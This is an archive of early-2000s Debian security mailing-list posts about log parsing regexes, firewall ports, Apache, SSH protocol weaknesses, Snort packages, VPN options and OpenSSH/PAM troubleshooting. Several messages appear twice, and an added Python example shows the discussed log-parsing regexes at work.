log_analysis configuration

2002-10-09 Thread Anne Carasik
Hi all,

I have something I've been trying to do for quite some
time--the joys of log parsing.

I have installed log_analysis, and it seems to be the
best tool to do the job. However, the man pages are
very difficult to read, and there are not any clear
examples of how to use this that I can find.

Does anyone have any configurations that work well with
log_analysis or have any tips on getting it to filter
SSH, sudo, etc..?

TIA,

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Security on an old machine

2002-10-15 Thread Anne Carasik
Steve Meyer grabbed a keyboard and typed...
> I have an old 486 without a cdrom in it.  If I pull the hard drive and 
> stick it in another machine to perform the install will this work?  And if 
> it does work will it make the system any less secure?

Since it's Debian, you don't need to stick it in a separate machine.
Just get enough floppies and do the install over a network :)

The only way this would be insecure is if someone broke into the
machine you're installing from and you copied over bad files.

-Anne
-- 
      .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: log_analysis configuration

2002-10-15 Thread Anne Carasik
Hi Mathias,

Thanks, that's helpful if I'm working on ONE machine. The problem
is I can't get this working for our loghost which gets all the
files.

All I get is this:

Other hosts syslogging to us:
290374 host1.example.edu
283974 host2.example.edu
289307 host3.example.edu

And so on.. no matter what I put in the config file :(

-Anne


Mathias Palm grabbed a keyboard and typed...
> On Thu, Oct 10, 2002 at 09:15:12AM -0700, Anne Carasik wrote:
> > Hi Mathias,
> 
> Hi Anne,
> 
> I send this one to the list again, I hope this is ok.
> 
> > 
> > Actually, it is a good start. The developer sent me a tutorial,
> > and I'm going to help him work on it for the clueless folks like
> > me :)
> > 
> > > config_version 0.38
> > 
> > Good, we're using the same version (I'm not surprised since 
> > Debian hasn't upgraded this yet).
> > 
> > > add arr log_type_list=
> > > iptables
> > > 
> > > add arr log_type_list=
> > > iptables
> > 
> > Ok, what is "add arr log_type_list" and why do you have this twice?
> > 
> This is just a name for a new type of log-files where all the
> definitions to follow apply. 
> 
> I am sure the doubling is by accident. As I said, I got a config
> somewhere else and rewrote it according to my needs.
> 
> > > add arr iptables_filenames=
> > > iptables
> > 
> > Ok, so that's the filename you're reading from, right?
> > 
> 
> It is the root of the logfiles the log_type "iptables" applies to.
> This rule actually reads iptables.0 ... or iptables.1.gz (when called
> with argument -a)
> 
> 
> You need to read about "perl regular expressions" (man perlre or heaps 
> of other sources about regular expressions) to understand the following
> and write your own configs. I am no expert in regexps and am sure you
> could write better ones. Regexps being a powerful tool, it is worthwhile
> to learn about them, so you won't waste your time.
> 
> > > set var iptables_date_pattern=^((?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)+\s+\d{1,2})\s+\d+\:\d+\:\d+\s+
> > 
> 
> Translated this means:
> 
> the brackets are just groupings
> 
> - ^ Match the beginning of the line
> - ?: some switch I can't remember why I put it there
> - Jan|Feb|Mar... matches Jan or Feb or Mar or ...
> - + match at least one time
> - \s match a whitespace (space, tab or similar)
> - \d{1,2} match one or two digits
> - \: match a : (: is a special character and needs to be escaped)
> 
> hence it matches a string like
> 
> Oct  9 17:34:27
> 
> at the beginning of the line.
> 
> > 
> > Ok, quick question:
> > 
> > What does +\s +\d do? I take it +d is an integer and +s is a string?
> > 
> 
> see the above
> 
> > > set var iptables_date_format=%b %e
> > 
> > Not sure what %b and %e give you.
> 
> read man strftime. I am not sure what it really does.
> 
> > 
> > > logtype: iptables
> > > pattern: tungurahua kernel: CHAIN INPUT.*SRC=($ip_pat).*DST=($ip_pat).*PROTO=(.*)
> > 
> > I take *'s work like they do in the shell?
> >
> 
> The . matches any character and the * matches the preceding
> character 0 or more times. I am not sure if the "preceding character" is
> the dot or the character replacing the dot. 
> 
> > > use_sprintf
> > > format: "%-3s packet from %-15s to %-15s" , $3, $1, $2
> > 
> > I have simple "format:" sections like:
> > format: STMP from $1 to $2
> > 
> > What does use_sprintf buy you?
> 
> I actually don't know, I guess sprintf sounded just familiar (knowing C
> quite well), so I didn't search for anything else 
> 
> 
> > 
> > > pattern: tungurahua kernel: CHAIN OUTPUT.*SRC=($ip_pat).*DST=($ip_pat).*PROTO=(.*)
> > 
> > Do the periods (.) give you anything if they aren't escaped with a \?
> > 
> 
> see before.
> 
> 
> Alright, hope this answers some of your questions. Good luck and thanks
> for writing the tutorial. I'd be interested in it and would be glad if
> you could notify me where to find it. 
> 
> Mathias

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~
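
The regular expressions discussed in the message above, exercised on constructed syslog lines. This is an added Python example, not log_analysis itself and not code from the thread; `IP_PAT` (standing in for `$ip_pat`), the sample lines, the year passed to `parse_date` and the tightened `\S+` rule are assumptions.

```python
import re
from datetime import datetime

# Date pattern as posted in the thread, re-joined from the wrapped lines.
# (?: ... ) groups the month alternatives WITHOUT capturing, so the only
# capture group is the "Mon DD" text that the date format then describes.
DATE_PATTERN = re.compile(
    r"^((?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)+\s+\d{1,2})"
    r"\s+\d+\:\d+\:\d+\s+"
)

# ASSUMPTION: stand-in for log_analysis's $ip_pat variable (dotted-quad IPv4).
IP_PAT = r"\d{1,3}(?:\.\d{1,3}){3}"

# Rule pattern as posted, with $ip_pat replaced by IP_PAT.
# ".*" is "any character, zero or more times"; the final (.*) is greedy and
# therefore captures everything after PROTO= up to the end of the line.
POSTED_RULE = re.compile(
    r"tungurahua kernel: CHAIN INPUT.*SRC=(" + IP_PAT + r")"
    r".*DST=(" + IP_PAT + r").*PROTO=(.*)"
)

# Added variant (not from the thread): \S+ stops at the first whitespace,
# so only the protocol name is captured.
TIGHT_RULE = re.compile(
    r"tungurahua kernel: CHAIN INPUT.*SRC=(" + IP_PAT + r")"
    r".*DST=(" + IP_PAT + r").*PROTO=(\S+)"
)

# sprintf-style format from the thread: $3, $1, $2 -> proto, src, dst.
FORMAT = "%-3s packet from %-15s to %-15s"

# Constructed sample lines (documentation addresses, hypothetical host1).
SAMPLE_LOCAL = (
    "Oct  9 17:34:27 tungurahua kernel: CHAIN INPUT IN=eth0 OUT= "
    "SRC=192.0.2.10 DST=192.0.2.1 LEN=60 PROTO=TCP SPT=4242 DPT=22"
)
SAMPLE_OTHER_HOST = (
    "Oct  9 17:34:29 host1 kernel: CHAIN INPUT IN=eth0 OUT= "
    "SRC=192.0.2.11 DST=192.0.2.1 LEN=60 PROTO=UDP SPT=53 DPT=1025"
)


def split_date(line):
    """Return (date_text, rest_of_line), or None if no syslog date leads the line."""
    m = DATE_PATTERN.match(line)
    if m is None:
        return None
    return m.group(1), line[m.end():]


def parse_date(date_text, year):
    """Parse the captured 'Mon DD' text.

    strftime's %b is the abbreviated month name and %e the space-padded day
    of the month. Python's strptime has no portable %e, so %d is used here.
    Syslog timestamps carry no year, so the caller must supply one.
    """
    return datetime.strptime("%s %d" % (date_text, year), "%b %d %Y")


def match_rule(line, rule):
    """Return (date_text, src, dst, proto) if the line matches the rule, else None."""
    parts = split_date(line)
    if parts is None:
        return None
    date_text, rest = parts
    m = rule.search(rest)
    if m is None:
        return None
    src, dst, proto = m.groups()
    return date_text, src, dst, proto


def report(fields):
    """Apply the thread's sprintf format to the captured fields."""
    _date_text, src, dst, proto = fields
    return FORMAT % (proto, src, dst)


if __name__ == "__main__":
    for name, rule in (("posted", POSTED_RULE), ("tight", TIGHT_RULE)):
        for line in (SAMPLE_LOCAL, SAMPLE_OTHER_HOST):
            fields = match_rule(line, rule)
            # A rule that names one host does not match lines from another host.
            print(name, "->", report(fields) if fields else "no match")
```
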





Re: port 113

2002-12-02 Thread Anne Carasik
Ports 135-139 (and I think 445) are Netbios ports.

Port 113 is auth/identd.

IMHO, it makes sense to not let these in through your
firewall.

-Anne

jjj3 grabbed a keyboard and typed...
> 
> Ok, but if the port is 137 is that a problem?
> 
> jjj3
> 
> Andy Coates writes:
> 
> > > Hi All,
> > > 
> > > Logs in my firewall shows me incoming connections to port 113 of the
> > > firewall!! What it means?
> > 
> > Some service you or your computer is connecting to is checking your
> > ident.  Disable the identd daemon or comment out the entry in inetd.conf
> > if you do it that way.
> > 
> > Usually happens when you IRC, or some FTP sites check.  Don't recall a
> > vulnerability for it.
> > 
> > Andy.
> > 
> 
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Removing stupid HTTP methods from Apache

2002-12-03 Thread Anne Carasik
Hi all,

I'm running Apache on a Woody machine, and I can't figure
out for the life of me how to disable certain insecure HTTP
methods like PROPFIND and PUT.

Can someone please help me out? I've been searching through
the docs and google, and I'm hoping I just overlooked something
obvious.

TIA,

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: SSH

2002-12-18 Thread Anne Carasik
Adrian 'Dagurashibanipal' von Bidder grabbed a keyboard and typed...
> As I said, I was not closely following the story, but IIRC the SSH
> Protocol version 1 has a principal design flaw that *can* *not* *be*
> *fixed* without breaking the protocol.

That is correct. I've had long discussions with Tatu Ylonen on this
when I was at SSH.com.

> There were, of course, additional issues with implementations, but ssh1
> never really was secure, and never will be. I'm not making any statement
> about the practical relevance of the attack here, nor do I know of any
> successful break in using this weakness, so YMMV.

Arcfour (RC4), the CRC32 attack, and the Secure RPC were problems
addressed by later versions of OpenSSH and SSH1 releases.

There are other problems too--and you're right--fixing them would
break SSH1. Instead, SSH2 was written to address these issues from
the ground up.

From what I remember, one of the biggest problems in SSH1 is that 
it uses weak authentication for the packets. There are other problems 
too, and the VUs issued by CERT only cover a portion of the issues.

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Question about snort binaries..

2003-01-30 Thread Anne Carasik
Hi all,

This may be a stupid question, but I'm going to ask anyway :)

Debian 3.0 uses Snort 1.8.4beta1, and unstable uses 1.9.0.

Is there a way to define that I only want to use the unstable
packages just related to snort or do I have to change my entire
distribution to unstable? Testing distribution has 1.8.7.

The problem I have is the snort rules are updated for 1.9.0,
but not for 1.8.4beta1 :(

Also, if you look at snort-rules-default for the different releases,
there is a BIG difference in sizes:

1.8.4 beta 1 58.1K
1.8.7        73.7k
1.9.0 rel 2  91.7

Any other suggestions or recommendations are also welcome.

Thanks,

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Question about snort binaries..

2003-01-30 Thread Anne Carasik
Noah L. Meyerhans grabbed a keyboard and typed...
> On Thu, Jan 30, 2003 at 09:35:05AM -0800, Anne Carasik wrote:
> > Is there a way to define that I only want to use the unstable
> > packages just related to snort or do I have to change my entire
> > distribution to unstable? Testing distribution has 1.8.7.
> No.  You would have to pull in all the dependencies from unstable as
> well, so you'd get all sorts of fun stuff like libc upgraded.

Yeah, I realized that, then I figured out what to do :)

> It's possible that you could try 'apt-get -b source snort' and have the
> right thing happen.  But then again, depending on the package in
> unstable, this might not be buildable on something else.

Right. So, here's what I've been doing:

edit /etc/apt/apt.conf to have the following:
APT::Default-Release "testing";

(I'm using testing instead of stable).

And, for the packages I want the latest release for, I've been
doing this:

apt-get -t unstable install snort
apt-get -t unstable install ssh
etc.

So far, I haven't had any problems :)

> > Any other suggestions or recommendations are also welcome.
> Go to www.snort.org, get the tarball, and install it in /usr/local/.
> That's what I've been doing.

That would have been my next step if the above didn't work.

> This was discussed at quite a bit of length a month or two ago.  Check
> the archives.

I saw something on snort-current about keeping rules up to date, but I 
don't remember anything about the binaries.

I'll go poke through the archives.

Thanks for your help :)

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: VPN: SSH or IPSec???

2003-04-16 Thread Anne Carasik
A true VPN is something like IPSec. SSH and SSL only tunnel TCP-based
traffic (at least that's what they are supposed to do). If you want a 
true VPN, do not use SSH or SSL.

IPSec is a good choice, but there are other VPN apps around
including CIPE, VTUN, and TINC. YMMV..

Check out "Building Linux VPNs" book by Kolesnikov and Hatch--
that would be your best bet.

I personally like IPSec because it's fairly standardized, but
again YMMV :)

-Anne

Servicios Informáticos UGT Galicia grabbed a keyboard and typed...
> 
> 
>   I'm planning to set up a VPN.  I started reading The VPN Howto, but I 
> come to a crossroad as early as soon as I read past chapter 2:
> 
>   Should I use SSH or IPSec to set up my VPN?
>   Which are the drawbacks and advantages of both?
> 
>   I would like to know what's your opinion about it so I can choose the 
> most suitable option for me.
> 
>   Thank you
> -- 
> 
> ==
> Felipe Martínez Hermo
> [EMAIL PROTECTED]
> [EMAIL PROTECTED]
> ==
> Servicios Informáticos
> UGT Galicia
> [EMAIL PROTECTED]
> ==
> 
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: [despammed] Re: VPN: SSH or IPSec???

2003-04-16 Thread Anne Carasik
Ed McMan grabbed a keyboard and typed...
> The VPN howto shows how to use ssh to make a true VPN.  It involves
> ppp, not ssh's port forwarding.  Unfortunately, the howto is very
> dated, and it relies on a software package that is very difficult to
> find.

You do not want to do that. Tunnelling PPP over SSH gives you serious
performance hits that you can reduce with other VPN implementations.

Don't get me wrong--SSH is good for a lot of things--just a VPN is
not one of them. I use SSH every day, and even maintain the SSH FAQ
(okay, so it's out-of-date, but Steve and I are working on that), but
I digress..

Here is a link on why PPP over SSH is a bad idea:
http://sites.inka.de/sites/bigred/devel/tcp-tcp.html

-Anne
-- 
      .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: configure ssh-access

2003-07-07 Thread Anne Carasik
Why not just limit the access through SSH public key?
It sounds like that would accomplish what you're trying
to do.

-Anne

[EMAIL PROTECTED] grabbed a keyboard and typed...
> Hi!
> 
> I want to make ssh-access possible only from a restricted
> number of hosts - those that are named in /etc/hosts.allow.
> Users who want to login have a DynDNS host-name that shall
> be listed in hosts.allow to make it possible for users with
> a dial-up internet connection, too.
> 
> BUT:
> The problem is that I can only login to the ssh-machine
> when I enter the IP-address to the hosts.allow file.
> Specifying the hosts DNS-name does not work!
> 
> AND:
> I'd prefer to specify the rules for logging into the machine
> in the sshd_config-file, not in hosts.allow/deny.
> But the AllowHosts/DenyHosts-options that could be used in 
> /etc/sshd_config earlier seem to be not any
> longer available at the SSH-version I'm using. 
> It's: openssh-3.4p1-80 on a SuSE 8.1
> 
> Has anybody ideas in this 2 problems?
> 
> thx in advance,
> Klaus
> 
> 
> 
> -- 
> Klaus Siegesleitner - [EMAIL PROTECTED] 
> SysAdmin at CAME (Center of Applied Molecular Engineering) 
> University of Salzburg, Jakob-Haringerstrasse 5, A-5020 Salzburg
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Probem with openssh and pam modules

2002-10-02 Thread Anne Carasik

Kill your sshd. Run it in debugging mode (it will not
fork a process):

# sshd -ddd

Open another window, now run the client in verbose mode:

$ ssh -vvv user@host

Then email us the output. :) Otherwise, this is really difficult
to troubleshoot.

-Anne



This one time, Alexis Sukrieh wrote:
> You're right, it was set to yes but after putting it to 'no', the same 
> problem is still there...
> 
> At 16:11 02/10/2002 +0200, you wrote:
> >You need to turn off UsePrivilegeSeparation
> >in your /etc/ssh/sshd_config file.
> >
> >"UsePrivilegeSeparation no"
> 
> 
> 
> 
> Alexis Sukrieh (sukria), <[EMAIL PROTECTED]>
> . homepage - [http://sukria.net]
> . clef PGP - [http://sukria.net/print.php?c=privacy]
> . mydynaweb - [http://www.mydynaweb.net]
> __
> 
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~






Re: Probem with openssh and pam modules

2002-10-02 Thread Anne Carasik
_request: try method password
> debug1: PAM Password authentication accepted for user "sukria"
> debug2: pam_acct_mgmt() = 0
> Accepted password for sukria from 127.0.0.1 port 32989 ssh2
> debug1: Entering interactive session for SSH2.
> debug1: fd 3 setting O_NONBLOCK
> debug1: fd 8 setting O_NONBLOCK
> debug1: server_init_dispatch_20
> debug1: server_input_channel_open: ctype session rchan 0 win 65536 max 16384
> debug1: input_session_request
> debug1: channel 0: new [server-session]
> debug1: session_new: init
> debug1: session_new: session 0
> debug1: session_open: channel 0
> debug1: session_open: session 0: link with channel 0
> debug1: server_input_channel_open: confirm session
> debug1: server_input_channel_req: channel 0 request pty-req reply 0
> debug1: session_by_channel: session 0 channel 0
> debug1: session_input_channel_req: session 0 req pty-req
> debug1: Allocating pty.
> debug1: session_pty_req: session 0 alloc /dev/pts/3
> debug3: tty_parse_modes: SSH2 n_bytes 256
> debug3: tty_parse_modes: ospeed 9600
> debug3: tty_parse_modes: ispeed 9600
> debug3: tty_parse_modes: 1 3
> debug3: tty_parse_modes: 2 28
> debug3: tty_parse_modes: 3 127
> debug3: tty_parse_modes: 4 21
> debug3: tty_parse_modes: 5 4
> debug3: tty_parse_modes: 6 0
> debug3: tty_parse_modes: 7 0
> debug3: tty_parse_modes: 8 17
> debug3: tty_parse_modes: 9 19
> debug3: tty_parse_modes: 10 26
> debug3: tty_parse_modes: 12 18
> debug3: tty_parse_modes: 13 23
> debug3: tty_parse_modes: 14 22
> debug3: tty_parse_modes: 18 15
> debug3: tty_parse_modes: 30 0
> debug3: tty_parse_modes: 31 0
> debug3: tty_parse_modes: 32 0
> debug3: tty_parse_modes: 33 0
> debug3: tty_parse_modes: 34 0
> debug3: tty_parse_modes: 35 0
> debug3: tty_parse_modes: 36 1
> debug3: tty_parse_modes: 37 0
> debug3: tty_parse_modes: 38 1
> debug3: tty_parse_modes: 39 0
> debug3: tty_parse_modes: 40 0
> debug3: tty_parse_modes: 41 0
> debug3: tty_parse_modes: 50 1
> debug3: tty_parse_modes: 51 1
> debug3: tty_parse_modes: 52 0
> debug3: tty_parse_modes: 53 1
> debug3: tty_parse_modes: 54 1
> debug3: tty_parse_modes: 55 1
> debug3: tty_parse_modes: 56 0
> debug3: tty_parse_modes: 57 0
> debug3: tty_parse_modes: 58 0
> debug3: tty_parse_modes: 59 1
> debug3: tty_parse_modes: 60 1
> debug3: tty_parse_modes: 61 1
> debug3: tty_parse_modes: 62 0
> debug3: tty_parse_modes: 70 1
> debug3: tty_parse_modes: 71 0
> debug3: tty_parse_modes: 72 1
> debug3: tty_parse_modes: 73 0
> debug3: tty_parse_modes: 74 0
> debug3: tty_parse_modes: 75 0
> debug3: tty_parse_modes: 90 1
> debug3: tty_parse_modes: 91 1
> debug3: tty_parse_modes: 92 0
> debug3: tty_parse_modes: 93 0
> debug1: server_input_channel_req: channel 0 request shell reply 0
> debug1: session_by_channel: session 0 channel 0
> debug1: session_input_channel_req: session 0 req shell
> debug1: PAM setting tty to "/dev/pts/3"
> PAM session setup failed[28]: Module is unknown
> debug1: Calling cleanup 0x805a3ec(0x80917a0)
> debug1: session_pty_cleanup: session 0 release /dev/pts/3
> debug1: Calling cleanup 0x80604b8(0x0)
> debug1: channel_free: channel 0: server-session, nchannels 1
> debug3: channel_free: status: The following connections are open:
>   #0 server-session (t10 r0 i0/0 o0/0 fd -1/-1)
> 
> debug3: channel_close_fds: channel 0: r -1 w -1 e -1
> debug1: Calling cleanup 0x8052b48(0x0)
> debug1: Calling cleanup 0x806be4c(0x0)
> poseidon:~#
> 
> 
> At 07:22 02/10/2002 -0700, Anne Carasik wrote:
> >Kill your sshd. Run it in debugging mode (it will not
> >fork a process):
> >
> ># sshd -ddd
> >
> >Open another window, now run the client in verbose mode:
> >
> >$ ssh -vvv user@host
> >
> >Then email us the output. :) Otherwise, this is really difficult
> >to troubleshoot.
> >
> >-Anne
> >
> >
> >
> >This one time, Alexis Sukrieh wrote:
> >> You're right, it was set to yes but after putting it to 'no', the same
> >> problem is still there...
> >>
> >> At 16:11 02/10/2002 +0200, you wrote:
> >> >You need to turn off UsePrivilegeSeparation
> >> >in your /etc/ssh/sshd_config file.
> >> >
> >> >"UsePrivilegeSeparation no"
> >>
> >>
> >>
> >>
> >> Alexis Sukrieh (sukria), <[EMAIL PROTECTED]>
> >> . homepage - [http://sukria.net]
> >> . clef PGP - [http://sukria.net/print.php?c=privacy]
> >> . mydynaweb - [http://www.mydynaweb.net]
> >> __
> >>
> >>
> >> --
> >> T

Re: Probem with openssh and pam modules

2002-10-02 Thread Anne Carasik

Hi Alexis,

Did you setup /etc/pam.d/ssh?

-Anne

This one time, Alexis Sukrieh wrote:
> Hehe :)
> 
> yes, but before mailing here, I've supposed that there was a missing 
> package dependency in unstable and I look for pam* stuff.
> 
> I found those ones
> 
> libpam-modules - Pluggable Authentication Modules for PAM
> libpam0g - Pluggable Authentication Modules library
> 
> and I installed it.
> 
> I also installed
> libpam-cracklib - PAM module to enable cracklib support.
> 
> but nothing changed...
> 
> I really don't see what to do ...
> 
> At 07:41 02/10/2002 -0700, you wrote:
> >Hi there,
> >
> >This might provide a clue:
> > debug1: PAM setting tty to "/dev/pts/3"
> > PAM session setup failed[28]: Module is unknown
> >
> >-Anne
> 
> 
> 
> 
> Alexis Sukrieh (sukria), <[EMAIL PROTECTED]>
> . homepage - [http://sukria.net]
> . clef PGP - [http://sukria.net/print.php?c=privacy]
> . mydynaweb - [http://www.mydynaweb.net]
> __
> 
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~






Re: Probem with openssh and pam modules

2002-10-02 Thread Anne Carasik

This one time, Alexis Sukrieh wrote:
> Well, again it is not the solution for me !
> It is yet turned off

Hmmm.. not sure. 

> is this a common problem ??? I'm surprised in the way that every 
> intelligent solutions you all provide to me are ineffective...

Hmmm.. try apt-get remove --purge openssh and reinstall it
after you get PAM working.

> is the ssh package young in the unstable branch ?

I haven't had any problems, but it is unstable after all ;)

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~






Re: Probem with openssh and pam modules

2002-10-02 Thread Anne Carasik

This one time, Lupe Christoph wrote:
> Correct me if I'm wrong, but don't we expect people who run unstable to
> diagnose problems themselves? If they can't they should be running stable
> or at least testing?

I think there's nothing wrong with helping someone out, no matter
which group they're running. Why should it matter? Isn't this mailing
list called debian-security? Not debian-security-stable.

> Unstable is not just a name...

Neither is testing nor stable :)

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~






log_analysis configuration

2002-10-09 Thread Anne Carasik

Hi all,

I have something I've been trying to do with quite some
time--the joys of log parsing.

I have installed log_analysis, and it seems to be the
best tool to do the job. However, the man pages are
very difficult to read, and there are not any clear
examples of how to use this that I can find.

Does anyone have any configurations that work well with
log_analysis or have any tips on getting it to filter
SSH, sudo, etc..?

TIA,

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~




msg07263/pgp0.pgp
Description: PGP signature


Re: Security on an old machine

2002-10-15 Thread Anne Carasik

Steve Meyer grabbed a keyboard and typed...
> I have an old 486 without a cdrom in it.  If I pull the hard drive and 
> stick it in another machine to perform the install will this work?  And if 
> it does work will it make the system any less secure?

Since it's Debian, you don't need to stick it in a separate machine.
Just get enough floppies and do the install over a network :)

The only way this would be insecure is if someone broke into the
machine you're installing from and you copied over bad files.

-Anne
-- 
      .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~




msg07393/pgp0.pgp
Description: PGP signature


Re: log_analysis configuration

2002-10-15 Thread Anne Carasik

Hi Mathias,

Thanks that's helpful if I'm workign on ONE machine. The problem
is I can't get this working for our loghost which gets all the
files.

All I get is this:

Other hosts syslogging to us:
290374 host1.example.edu
283974 host2.example.edu
289307 host3.example.edu

And so on.. no matter what I put in the config file :(

-Anne


Mathias Palm grabbed a keyboard and typed...
> On Thu, Oct 10, 2002 at 09:15:12AM -0700, Anne Carasik wrote:
> > Hi Mathias,
> 
> Hi Anne,
> 
> I send this one to the list again, I hope this is ok.
> 
> > 
> > Actually, it is a good start. The developer sent me a tutorial,
> > and I'm going to help him work on it for the clueless folks like
> > me :)
> > 
> > > config_version 0.38
> > 
> > Good, we're using the same version (I'm not surprised since 
> > Debian hasn't upgraded this yet).
> > 
> > > add arr log_type_list=
> > > iptables
> > > 
> > > add arr log_type_list=
> > > iptables
> > 
> > Ok, what is "add arr log_type_list" and why do you have this twice?
> > 
> This is just a name for the for a new type of log-files  where all the
> definitions to follow apply. 
> 
> I am sure the doubling is by accident. As I said, I got a config
> somewhere else and rewrote it according to my needs.
> 
> > > add arr iptables_filenames=
> > > iptables
> > 
> > Ok, so that's the filename you're reading from, right?
> > 
> 
> It is the root of the logfiles the log_type "iptables" applies to.
> This rule actually reads iptables.0 ... or iptables.1.gz (when called
> with argument -a)
> 
> 
> You need to read about "perl regular expressions" (man perlre or heaps 
> of other sources about regular expressions) to understand the following
> and write your own configs. I am no expert in regexps and am sure you
> could write better ones. Regexps being a powerful tool it is worthwile
> to learn about them, so you wont waste your time.
> 
> > > set var iptables_date_pattern=^((?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oc
> > > t|Nov|Dec)+\s+\d{1,2})\s+\d+\:\d+\:\d+\s+
> > 
> 
> Translated this means:
> 
> the brackets are just groupings
> 
> - ^ Match the beginning of the line
> - ?: some switch I cant remember why I put it there
> - Jan|Feb|Mar... matches Jan or Feb or Mar or ...
> - + match at least one time
> - \s match a whitespace (space, tab or similiar)
> - \d{1,2} match one or two digits
> - \: match a : (: is a special character and needs to be escaped)
> 
> hence it matches a string like
> 
> Oct  9 17:34:27
> 
> at the beginning of the line.
> 
> > 
> > Ok, quick question:
> > 
> > What does +\s +\d do? I take it +d is an integer and +s is a string?
> > 
> 
> see the above
> 
> > > set var iptables_date_format=%b %e
> > 
> > Not sure what %b and %e give you.
> 
> read man strftime. I am not sure what it really does.
> 
> > 
> > > logtype: iptables
> > > pattern: tungurahua kernel: CHAIN INPUT.*SRC=($ip_pat).*DST=($ip_pat).*PR
> > > OTO=(.*)
> > 
> > I take *'s work like they do in the shell?
> >
> 
> The . matches any character and the * matches the preceding
> character 0 or more times. I am not sure if the "preceding character" is
> the dot or the character replacing the dot. 
> 
> > > use_sprintf
> > > format: "%-3s packet from %-15s to %-15s" , $3, $1, $2
> > 
> > I have simple "format:" sections like:
> > format: STMP from $1 to $2
> > 
> > What does use_sprintf buy you?
> 
> I actually dont know, I guess sprintf sounded just  familiar (knowing C
> quite well), so I didn't search for anything else 
> 
> 
> > 
> > > pattern: tungurahua kernel: CHAIN OUTPUT.*SRC=($ip_pat).*DST=($ip_pat).*P
> > > ROTO=(.*)
> > 
> > Do the periods (.) give you anything if they aren't escaped with a \?
> > 
> 
> see before.
> 
> 
> Alright, hope this answers some of your questions. Good luck and thanks
> for writing the tutorial. I'd be interested in it and would be glad if
> you could notify me where to find it. 
> 
> Mathias

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~




msg07399/pgp0.pgp
Description: PGP signature


Re: port 113

2002-12-02 Thread Anne Carasik
Ports 135-139 (and I think 445) are Netbios ports.

Port 113 is auth/identd.

IMHO, it makes sense to not let these in through your
firewall.

-Anne

jjj3 grabbed a keyboard and typed...
> 
> Ok, but if the port is 137 is that a problem?
> 
> jjj3
> 
> Andy Coates writes:
> 
> > > Hi All,
> > > 
> > > Logs in my firewall shows me incoming connections to port 113 of the
> > > firewall!! What it means?
> > 
> > Some service you or your computer is connecting to is checking your
> > ident.  Disable the identd daemon or comment out the entry in inetd.conf
> > if you do it that way.
> > 
> > Usually happens when you IRC, or some FTP sites check.  Don't recall a
> > vulnerability for it.
> > 
> > Andy.
> > 
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
